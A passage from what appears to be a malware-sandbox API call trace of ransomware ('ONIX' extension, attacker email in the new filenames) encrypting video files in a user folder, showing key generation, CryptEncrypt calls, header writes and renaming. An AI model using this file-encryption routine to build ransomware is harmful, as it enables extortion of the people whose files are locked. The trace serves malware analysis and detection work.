(lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j8w31.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.724] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.725] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4c58, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.725] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.725] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.725] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.725] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.726] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.726] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.726] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv", dwFileAttributes=0x80) returned 1 [0121.726] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv") returned 47 [0121.726] GetProcessHeap () returned 0x410000 [0121.726] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xce) returned 0x477600 [0121.726] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv" [0121.726] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.726] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=19544) returned 1 [0121.726] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4c58 [0121.726] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.726] GetProcessHeap () returned 0x410000 [0121.726] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.726] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.728] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.729] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.730] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.731] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c58) returned 0x4dcb68 [0121.731] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c58) returned 0x4e17c8 [0121.731] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.732] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x4c58, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x4c58, lpOverlapped=0x0) returned 1 [0121.742] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4c58, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.742] CloseHandle (hObject=0x4c8) returned 1 [0121.742] GetProcessHeap () returned 0x410000 [0121.742] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.742] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j8w31.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j8w31.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j8w31.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.744] GetProcessHeap () returned 0x410000 [0121.744] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.744] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8398c3c0, ftCreationTime.dwHighDateTime=0x1d5e7c8, ftLastAccessTime.dwLowDateTime=0xc5f804b0, ftLastAccessTime.dwHighDateTime=0x1d5e69c, ftLastWriteTime.dwLowDateTime=0xc5f804b0, ftLastWriteTime.dwHighDateTime=0x1d5e69c, nFileSizeHigh=0x0, nFileSizeLow=0xcc0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J9xoqbtg1x.mkv", cAlternateFileName="J9XOQB~1.MKV")) returned 1 [0121.744] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j9xoqbtg1x.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.745] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.745] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xcc0f, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.745] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.745] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.746] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.746] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.746] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.746] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.746] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv", dwFileAttributes=0x80) returned 1 [0121.746] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv") returned 52 [0121.746] GetProcessHeap () returned 0x410000 [0121.746] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x44faf8 [0121.746] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv" [0121.746] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.746] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=52239) returned 1 [0121.746] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xcc0f [0121.746] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.746] GetProcessHeap () returned 0x410000 [0121.746] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.746] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.747] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.748] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.749] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc0f) returned 0x4dcb68 [0121.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc0f) returned 0xf50048 [0121.751] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.751] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xcc0f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xcc0f, lpOverlapped=0x0) returned 1 [0121.753] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xcc0f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.753] CloseHandle (hObject=0x4c8) returned 1 [0121.754] GetProcessHeap () returned 0x410000 [0121.754] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.754] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j9xoqbtg1x.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J9xoqbtg1x.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j9xoqbtg1x.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.756] GetProcessHeap () returned 0x410000 [0121.756] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.756] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5eafe60, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x8a0da020, ftLastAccessTime.dwHighDateTime=0x1d5e072, ftLastWriteTime.dwLowDateTime=0x8a0da020, ftLastWriteTime.dwHighDateTime=0x1d5e072, nFileSizeHigh=0x0, nFileSizeLow=0x4a45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jo-GgC3scxQ.avi", cAlternateFileName="JO-GGC~1.AVI")) returned 1 [0121.756] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jo-ggc3scxq.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.756] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.756] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4a45, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.756] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.756] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.757] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.757] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.757] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.757] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.757] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi", dwFileAttributes=0x80) returned 1 [0121.758] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi") returned 53 [0121.758] GetProcessHeap () returned 0x410000 [0121.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x44faf8 [0121.758] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi" [0121.758] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.758] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=19013) returned 1 [0121.758] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4a45 [0121.758] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.758] GetProcessHeap () returned 0x410000 [0121.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.758] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.759] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.761] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.762] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.763] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a45) returned 0x4dcb68 [0121.763] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a45) returned 0x4e15b8 [0121.763] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.763] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x4a45, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x4a45, lpOverlapped=0x0) returned 1 [0121.765] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4a45, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.765] CloseHandle (hObject=0x4c8) returned 1 [0121.765] GetProcessHeap () returned 0x410000 [0121.765] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.765] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jo-ggc3scxq.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jo-GgC3scxQ.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jo-ggc3scxq.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.770] GetProcessHeap () returned 0x410000 [0121.770] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.770] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa76212a0, ftCreationTime.dwHighDateTime=0x1d5da32, ftLastAccessTime.dwLowDateTime=0x929d6430, ftLastAccessTime.dwHighDateTime=0x1d5e407, ftLastWriteTime.dwLowDateTime=0x929d6430, ftLastWriteTime.dwHighDateTime=0x1d5e407, nFileSizeHigh=0x0, nFileSizeLow=0x8dd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="keQL.mp4", cAlternateFileName="")) returned 1 [0121.770] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\keql.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.770] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.771] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8dd3, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.771] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.771] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.771] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.771] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.772] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.772] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.772] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4", dwFileAttributes=0x80) returned 1 [0121.772] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4") returned 46 [0121.772] GetProcessHeap () returned 0x410000 [0121.772] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc) returned 0x477600 [0121.772] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4" [0121.772] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.772] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=36307) returned 1 [0121.772] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x8dd3 [0121.772] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.772] GetProcessHeap () returned 0x410000 [0121.772] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.772] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.772] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.774] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.775] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.776] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8dd3) returned 0x4dcb68 [0121.776] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8dd3) returned 0xf50048 [0121.777] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.777] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x8dd3, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x8dd3, lpOverlapped=0x0) returned 1 [0121.779] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x8dd3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.779] CloseHandle (hObject=0x4c8) returned 1 [0121.780] GetProcessHeap () returned 0x410000 [0121.780] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.780] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\keql.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\keQL.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\keql.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.782] GetProcessHeap () returned 0x410000 [0121.782] HeapFree (in: 